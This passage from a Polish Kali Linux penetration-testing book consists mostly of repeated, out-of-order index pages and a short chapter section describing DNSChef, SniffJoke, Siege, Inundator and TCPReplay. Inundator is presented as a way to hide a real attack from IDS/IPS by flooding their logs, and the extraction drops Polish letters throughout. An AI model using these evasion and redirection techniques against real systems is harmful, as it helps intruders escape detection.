oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
